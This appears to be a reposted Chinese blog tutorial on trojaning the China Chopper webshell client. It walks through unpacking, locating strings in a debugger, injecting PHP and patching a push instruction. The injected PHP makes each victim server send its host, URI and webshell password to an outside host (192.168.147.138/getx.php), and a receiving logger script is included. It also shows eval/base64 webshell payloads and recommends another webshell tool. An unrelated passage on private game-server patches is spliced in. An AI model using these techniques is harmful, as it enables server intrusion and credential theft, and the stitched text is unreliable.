如何给中国菜刀添加隐蔽后门

如何给中国菜刀添加隐蔽后门,第1张

1、后门如何触发

这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。

当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图

当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。

2、菜刀脱壳

在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。

3、查看数据包,分析流程(右键-编辑)

本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,

数据如下

a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D

一共有3个参数,

a url解码后为@eval (base64_decode($_POST[z0]))

z0先url解码,在base64解码为

@ini_set("display_errors","0")@set_time_limit(0)@set_magic_quotes_runtime(0)echo("->|")$F=base64_decode($_POST["z1"])$P=@fopen($F,"r")echo(@fread($P,filesize($F)))@fclose($P)echo("|<-")die()

Z1先url解码,在base64解码为

C:\\wamp\\www\\robots.txt

稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95)@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST))}

如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。

4、使用OD分析

使用OD打开中国菜刀,右键搜索字符串,结果如下:

定位到php读取文的字符串处,点击进去到代码处

可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。

5、修改菜刀程序文件

由上可知,字符串的地址为0x49ba94,查看内存数据,

发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。

这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。

将后门字符串

$F=base64_decode($_POST["z1"])$P=@fopen($F,"r")echo(@fread($P,filesize($F)))@fclose($P)if(@$_COOKIE['f1']!=95){@setcookie('f1',95)@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST))}

放到文件841d0处

打开010editor 将上述字符串复制到010editor中,

由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,

保存文件,这样后门字符串就被我们添加到程序中了。

6、使用OD修改程序代码

用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。

0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下

保存修改的文件即可。

7、测试修改结果

修改文件后,我们在看看菜刀-右键编辑,抓到数据包

Z0解密后为

@ini_set("display_errors","0")@set_time_limit(0)@set_magic_quotes_runtime(0)echo("->|")$F=base64_decode($_POST["z1"])$P=@fopen($F,"r")echo(@fread($P,filesize($F)))@fclose($P)if(@$_COOKIE['f1']!=95){@setcookie('f1',95)@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST))}echo("|<-")die()

可见我们的后门代码也一起被发送到服务端执行了。

编写加单的getx.php接收结果,

getx.php:

<?php

$getx = $_GET["caidao"]

$file = fopen("getx.txt","a+")

fwrite($file,$getx)

fwrite($file,"\r\n")

fclose($file)

?>

结果如下:

8、后记

通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。

刀菜需要自己做变形,加载失败可能是服务器WAF拦截了,传统一句话优化看这:那些强悍的PHP一句话后门;推荐使用新技术:“冰蝎”动态二进制加密网站管理客户端,WebShell工具

Connection closed的意思是连接关闭了,停止传输的意思。是指你和服务器的连接关闭了,你进入不到服务器。

解决的的方法是:

1 下载游戏客户端,注意别把补丁当客户端了!

2 解压。比如解压到D/游戏。这时出现DAT和MAP两个文件。

3 下载你玩的SF补丁,解压到D/。这时也出现DAT和MAP两个文件。

4 把“3”里面(也就是你的补丁)里的DAT和MAP里面的文件复制到D/传奇(也就是你玩的游戏的文件DAT和MAP)里面,结果出来“文件已存在,要全部代替吗?”你选“全部先是”。

5 把你SF的登陆器就放在D/传奇。

6 进去试试,行不??

注意 D/游戏 是自己创建的一个文件,名字随你怎么写都行,这里是为了你方便自己记住地方。


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/bake/11725622.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-18
下一篇 2023-05-18

发表评论

登录后才能评论

评论列表(0条)

保存